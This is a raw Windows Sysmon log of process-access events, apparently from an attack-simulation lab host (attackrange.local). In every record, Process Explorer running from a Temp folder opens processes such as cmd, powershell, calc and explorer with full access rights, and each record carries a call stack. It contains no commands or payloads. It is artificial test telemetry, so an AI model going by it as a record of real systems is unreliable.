15:16:37.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.282{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 